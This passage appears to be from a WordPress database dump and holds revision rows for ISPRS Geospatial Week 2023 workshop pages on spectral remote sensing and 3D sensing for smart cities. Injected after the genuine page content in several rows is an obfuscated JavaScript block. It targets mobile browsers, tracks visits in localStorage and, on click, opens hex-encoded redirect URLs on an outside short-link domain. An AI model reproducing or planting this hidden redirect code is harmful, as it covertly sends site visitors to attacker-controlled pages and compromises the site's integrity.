_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong>','','inherit','closed','closed','','3855-revision-v1','','','2023-02-07 02:08:33','2023-02-07 02:08:33','',3855,'https://gsw2023.com/?p=3890',0,'revision','',0),
(3891,1,'2023-02-09 06:50:31','2023-02-09 06:50:31','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2583\" img_size=\"322x196\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>3DS Smart Cities - 3D Sensing for Smart Cities</strong></span></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>High-accuracy and high-efficiency 3D sensing and associated data processing techniques are urgently needed for smart cities. 3D geospatial data acquired by digital photogrammetry and LiDAR systems have become one of the most important data sources to support smart city applications, such as city infrastructure inventory, city planning, urban design, autonomous driving, etc. This workshop will seek contributions covering advanced topics related to the state of the art and future trends of 3D sensing technology and algorithms for smart city applications. Papers addressing the following topics are welcome: photogrammetric mapping, LiDAR point cloud processing, ubiquitous sensing, cross-modality sensing, etc. The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"38\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: brown;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Airborne photogrammetric mapping for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Airborne LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Mobile LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>UAS-based photogrammetric mapping for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>UAS borne LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning methods for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Low-cost multi-sensor systems for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor system design and on-board processing</strong></h6>\n</li>\n<li>\n<h6><strong>Cross-modality sensing data integration</strong></h6>\n</li>\n<li>\n<h6><strong>Ubiquitous sensing with sensors in mobile devices</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor fusion in support of smart city applications</strong></h6>\n</li>\n<li class=\"m_-7709850013166616182MsoListParagraph\">\n<h6><b>Place recognition and localization for smart cities</b></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:brown;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Andrea Lingua, Polytechnic University of Turin, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Jiaojiao Tian, German Aerospace Center (DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Rongjun Qin, Ohio State University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Bisheng Yang, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Cheng Wang, Chinese Academy of Sciences, China</strong></h6>\n</li>\n<li>\n<h6><strong>Chun Liu, Tongji University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Jinha Jung, Purdue University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Yan Xia, Technical University of Munich, Germany</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','3DS Smart Cities - 3D Sensing for Smart Cities','','inherit','closed','closed','','2572-revision-v1','','','2023-02-09 06:50:31','2023-02-09 06:50:31','',2572,'https://gsw2023.com/?p=3891',0,'revision','',0),
(3892,1,'2023-02-09 06:57:58','2023-02-09 06:57:58','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2583\" img_size=\"322x196\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>3DS Smart Cities - 3D Sensing for Smart Cities</strong></span></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>High-accuracy and high-efficiency 3D sensing and associated data processing techniques are urgently needed for smart cities. 3D geospatial data acquired by digital photogrammetry and LiDAR systems have become one of the most important data sources to support smart city applications, such as city infrastructure inventory, city planning, urban design, autonomous driving, etc. This workshop will seek contributions covering advanced topics related to the state of the art and future trends of 3D sensing technology and algorithms for smart city applications. Papers addressing the following topics are welcome: photogrammetric mapping, LiDAR point cloud processing, ubiquitous sensing, cross-modality sensing, etc. The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"38\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: brown;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Airborne photogrammetric mapping for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Airborne LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Mobile LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>UAS-based photogrammetric mapping for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>UAS borne LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning methods for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Low-cost multi-sensor systems for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor system design and on-board processing</strong></h6>\n</li>\n<li>\n<h6><strong>Cross-modality sensing data integration</strong></h6>\n</li>\n<li>\n<h6><strong>Ubiquitous sensing with sensors in mobile devices</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor fusion in support of smart city applications</strong></h6>\n</li>\n<li class=\"m_-7709850013166616182MsoListParagraph\">\n<h6><b>Place recognition and localization for smart cities</b></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:brown;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Andrea Lingua, Polytechnic University of Turin, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Jiaojiao Tian, German Aerospace Center (DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Rongjun Qin, Ohio State University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Bisheng Yang, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Cheng Wang, Chinese Academy of Sciences, China</strong></h6>\n</li>\n<li>\n<h6><strong>Chun Liu, Tongji University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Jinha Jung, Purdue University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Yan 